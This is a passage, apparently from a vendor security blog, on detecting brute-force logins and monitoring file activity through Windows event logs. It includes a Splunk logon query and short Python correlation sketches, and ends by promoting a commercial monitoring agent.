In reality, processing an event stream to make it ready for brute force detection analysis is an additional challenge to consider.

Let’s take Windows, the most ubiquitous event source of them all, as an example. The Windows successful login event (event ID 4624) and failed login event (event ID 4625) are logged locally on each computer, which makes them more challenging (though not impossible) to collect. It also means that an attacker who owns the computer can prevent them from ever being received. The domain controller registers an authentication event, which can be used as a proxy for a login event. This one comes in Kerberos (event ID 4768) and NTLM (event ID 4776) variants for Windows 2008 and above, and in yet another set of event IDs for earlier Windows versions.

Once we know which events to track, we still need to know how to identify success and failure correctly. Local login success and failure are separate events, while for the domain controller authentication events, success and failure are flagged within the event.
The following Splunk search (from the GoSplunk search repository), which I’ve used to identify failed vs. successful Windows logins, demonstrates the level of knowledge needed to extract such information from events – and it doesn’t even support the domain controller authentication alternative.

source="WinEventLog:security" (Logon_Type=2 OR Logon_Type=7 OR Logon_Type=10) (EventCode=528 OR EventCode=540 OR EventCode=4624 OR EventCode=4625 OR EventCode=529 OR EventCode=530 OR EventCode=531 OR EventCode=532 OR EventCode=533 OR EventCode=534 OR EventCode=535 OR EventCode=536 OR EventCode=537 OR EventCode=539)
| eval status=case(EventCode=528, "Successful Logon", EventCode=540, "Successful Logon", EventCode=4624, "Successful Logon", EventCode=4625, "Failed Logon", EventCode=529, "Failed Logon", EventCode=530, "Failed Logon", EventCode=531, "Failed Logon", EventCode=532, "Failed Logon", EventCode=533, "Failed Logon", EventCode=534, "Failed Logon", EventCode=535, "Failed Logon", EventCode=536, "Failed Logon", EventCode=537, "Failed Logon", EventCode=539, "Failed Logon")
| stats count by status
| sort - count

Detection through the Cyber Kill-Chain

The brute force example makes it clear that attack detection is not trivial. None of the detection methods described above is bulletproof, and attackers are continually enhancing their detection avoidance methods.

Detection requires expertise in both attack techniques and the behavior of the monitored systems, and it requires ongoing updates and enhancements. It’s therefore critical that any system used for detecting brute force attacks include out-of-the-box detection algorithms and updates to those algorithms. It’s not enough to simply provide the means to collect events and to write rules or algorithms, leaving the user with the task of implementing the actual detection logic. It also suggests that it’s worthwhile to understand how a system detects brute force, rather than just relying on a general promise of brute force detection. There’s just so much more to it than a textbook example provides.

It is also yet another great example of why a layered detection system, one that can capture attackers past the infiltration point, is critical, and why the cyber kill-chain is a good place to start.

Exploring Windows File Activity Monitoring with the Windows Event Log


One might hope that Microsoft would provide straightforward and coherent file activity events in the Windows event log. The file event log is important for all the usual reasons: compliance, forensics, monitoring privileged users, and detecting ransomware and other malware attacks while they’re happening. A log of file activities seems simple and easy, right? All that’s needed is a timestamp, user name, file name, operation (create, read, modify, rename, delete, etc.), and a result (success or failure).

But this is Microsoft. And they never, ever do anything that’s nice and easy.

The Case of “Delete”

Let’s start with delete, the simplest scenario. Google “Windows file delete event” and the first answer, as usual, will be from Randy Franklin Smith’s Windows Event Encyclopedia: “4660: An object was deleted”.

To a Windows event newbie, it would appear that our research effort is complete. Unfortunately, this delete event is missing one critical piece of information: the file name. Why does that matter? If you’re detecting ransomware, you want to know which files are being encrypted. Likewise, when being alerted on privileged user access to sensitive files, you’d expect to know exactly which files were accessed.

The hard part is determining the file name associated with an event. Even identifying something as simple as a file name isn’t easy, because Windows event information is spread out across multiple log entries. For example, you have to correlate the delete event 4660 with the “access object” event 4663. In practice, you’d create a search for matching 4660 and 4663 events, and then combine information from both events to derive a more user-friendly log entry.
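For illustration only (not production code), the correlation might look like the short Python sketch below. It assumes the raw events have already been parsed into dictionaries; the EventID, HandleID, and ObjectName field names are hypothetical stand-ins for whatever your collector produces.

def label_deletes(events):
    """Join 4663 (which carries the file name) with 4660 (which confirms
    the delete) on their shared Handle ID."""
    handle_to_file = {}
    for ev in events:
        if ev["EventID"] == 4663:
            handle_to_file[ev["HandleID"]] = ev["ObjectName"]
        elif ev["EventID"] == 4660:
            yield {
                "action": "delete",
                "file": handle_to_file.get(ev["HandleID"], "<unknown>"),
            }

# A 4663/4660 pair sharing a handle yields a named delete record:
sample = [
    {"EventID": 4663, "HandleID": "0x1a4", "ObjectName": r"C:\docs\q3.xlsx"},
    {"EventID": 4660, "HandleID": "0x1a4"},
]
print(list(label_deletes(sample)))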

Let’s continue discussing the correlations needed to implement file activity monitoring using the Windows event log. The actual implementation depends on the tools used to collect the events: a database query, a program, or a dedicated correlation engine, a program tailored for such activity.

The Windows File Activity Audit Flow

Windows does not log file activity the way you’d expect. Instead, it logs granular file operations that require further processing. So let’s take a deep dive into how Windows logs file operations.

Windows logs each file operation as a sequence of micro-operation events: a handle request (4656), one or more access events (4663), and finally a handle close (4658). The delete operation is a unique case in that there is a fourth event, 4660, mentioned above. The sequence is tied together by the “Handle ID” event property, which is unique to the sequence (at least until a reboot).

The event that provides the most information is 4663, which identifies that an attempt was made to access an object. However, the name is misleading, because Windows only issues the event when the operation is complete. In reality, there might be multiple 4663 events for a single handle, logging the smaller operations that make up the overall action. For example, a rename involves a read, a delete, and a write operation. Also, one 4663 event might include multiple values in the “Accesses” property, which lists the access rights exercised to perform the operation. Those “Accesses” serve as our guideline for the operations themselves. More on that later.

The following list provides more information about each event:

  • 4656 (“A handle to an object was requested”): logs the start of every file activity, but does not guarantee that it succeeded. It provides the name of the file.
  • 4663 (“An attempt was made to access an object”): logs the specific micro-operations performed as part of the activity. It tells you what exactly was done.
  • 4660 (“An object was deleted”): logs a delete operation. It is the only way to verify that an activity is actually a delete.
  • 4658 (“The handle to an object was closed”): logs the end of a file activity. It tells you how much time the activity took.

One step you would not want to skip is setting Windows to log those events, which is not the default. You’ll find a good tutorial on how to do that here.

You get the idea: you’re dealing with lots of different low-level events related to higher-level file actions. Let’s take up the problem of correlating them to produce user-friendly information.

Interpreting “Accesses”

To identify the actual action, we need to decode the exercised permissions as reported in the “Accesses” event property. Unfortunately, this is not a one-to-one mapping: each file action is made up of many smaller operations that Windows performs, and those smaller operations are the ones logged.

The more important “Accesses” property values are:

  • “WriteData” implies that a file was created or modified, unless a “Delete” access was recorded for the same handle.
  • “ReadData” will be logged as part of practically any action. It implies a plain access if no “Delete” or “WriteData” was encountered for the same handle, and for the same file name around the same time.
  • “Delete” may signify many things: a delete, a rename (same folder), a move (to a different folder), or a recycle, which is essentially a move to the recycle bin. Event 4660 with the same handle is what differentiates them: for a delete or recycle, a 4660 event is issued; for a rename or move, it is not. (A sketch of this decoding logic follows the list.)
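Putting those rules together, a first approximation of the decoding logic might look like the Python sketch below. The inputs (the set of “Accesses” strings seen for one handle, plus a flag for whether a 4660 arrived on the same handle) are assumed to come from the correlation described earlier; this is a simplified illustration, not the definitive mapping.

def classify_action(accesses, saw_4660):
    """Map the accumulated "Accesses" values for one handle to a
    user-facing file action, following the rules above."""
    if "Delete" in accesses:
        # 4660 separates delete/recycle from rename/move.
        return "delete or recycle" if saw_4660 else "rename or move"
    if "WriteData" in accesses:
        return "create or modify"
    if "ReadData" in accesses:
        return "access"
    return "other"

# A rename exercises read, write, and delete on the handle, with no 4660:
print(classify_action({"ReadData", "WriteData", "Delete"}, saw_4660=False))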

Complex?

Consider this only a starting point. The analysis above is somewhat simplified, and a real-world implementation will require more research. Some areas for further research are:

  • Differentiating delete from recycle, and move from rename.
  • Analyzing attribute access (with or without other access operations).
  • Handling event 4659, which is similar to 4660 but is logged on a request to delete a locked file on the next reboot rather than immediately.
  • Researching reports that events come out of order, and that the “request handle” event (4656) may not be the first in the sequence.

You may want to review this PowerShell script, which reads Windows events and generates a meaningful file activity report from them, to get a somewhat less simplified analysis. A word of warning: it is not for the faint-hearted!

Windows Event Log Limitations for File Access Monitoring

While the Windows file activity events seem comprehensive, there are things that cannot be determined using only the event log. A few examples are:

  • Create vs. modify: the only way to know whether this is a new file or a modified file is to have knowledge of the prior state, i.e. whether the file existed before.
  • Missing information on failures: in the case of an operation rejected due to insufficient permissions, the only event issued is 4656. Without a full sequence, most of the processing described in this article is not possible.
  • Cut & paste: while one would assume “cut and paste” would be logged like a move operation, in practice it appears as a delete operation followed by a create operation, with no relation whatsoever between the two.

Scalability Considerations

Collecting Windows file activity produces a massive event flow, and the Microsoft event structure, which generates many events for a single file action, does not help. Such collection will require more network bandwidth to transfer events and more storage to keep them. Furthermore, the sophisticated correlation logic required may need a powerful processing unit and a lot of memory.

To reduce the overhead, you may want to:

  • Carefully select which files you monitor based on the scenario you plan to implement. For example, you may want to track only system files or shares that include sensitive data.
  • Limit collection of unneeded events at the source. If your collection infrastructure uses Microsoft Event Forwarding, you can build sophisticated filters based on event IDs and event properties. In our case, collect only events 4656, 4660, 4663, and optionally 4658, and only for the “Accesses” values needed.
  • Limit event storage and event sizes, as raw Windows events are sizable.

An Alternative Approach

Real-world experience shows that not many organizations succeed in using the Windows event log for file activity monitoring. An alternative approach to implementing this important security and compliance measure is to use a lightweight agent on each monitored Windows system, with a focus on file servers. Such an agent, like the Varonis agent that works alongside DatAdvantage, records file activity with minimal server and network overhead, enabling better threat detection and forensics.